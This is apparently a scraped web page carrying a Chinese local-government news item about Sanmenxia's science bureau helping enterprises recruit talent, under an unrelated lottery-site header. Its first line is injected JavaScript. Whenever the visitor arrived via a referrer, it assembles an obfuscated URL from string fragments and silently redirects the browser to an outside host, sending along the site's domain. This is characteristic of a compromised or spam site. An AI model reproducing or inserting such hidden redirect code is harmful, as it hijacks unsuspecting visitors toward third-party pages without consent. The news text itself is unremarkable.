var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

三门峡市多措并举助力企业招才引智


发布日期:2021-07-07 15:42来源:三门峡市科学技术局 阅读次数:

  三门峡企业家座谈会召开后,三门峡市科技局高度重视、精心安排、主动服务,对照企业反映的“专业人才缺失”问题,通过鼓励异地研发、强化科技合作、加大科技投入、推动区域创新、注重政策宣讲等方式,多措并举助力企业招才引智。

  一是鼓励异地研发聚人才。坚持“不求所有,但求所用”原则,支持企业建设“飞地”研发基地,探索实现创新人才在外地研发,技术成果在本市转化的创新合作模式。二是强化科技合作引人才。以铜产业高质量发展大会为契机,推动华鑫铜箔与西安科技大学签订了产学研合作协议,共建校企联合研发基地。三是加大科技投入奖人才。加大科技成果奖励力度,对三门峡市获得省科学技术奖的企业,按照一等奖50万、二等奖30万、三等奖20万给予市级配套奖励,激发科技人员创新热情。四是推动区域创新汇人才。中科院河南育成中心黄河金三角分中心等7个技术转移平台相继落户三门峡市,有效汇集了一批人才、技术和成果,在三门峡市开展研发转化。五是注重政策宣讲育人才。召开科技政策宣讲会,线上线下广泛宣传,为三门峡市科技企业培育了一批“科技政策明白人”。

  下一步,三门峡市科技局将充分发挥科技部门工作职能,围绕企业人才缺失问题,进一步加快创新平台建设,加大政策宣传力度,加强校企对接合作,优化人才发展环境,为企业招才引智、创新发展提供科技支撑。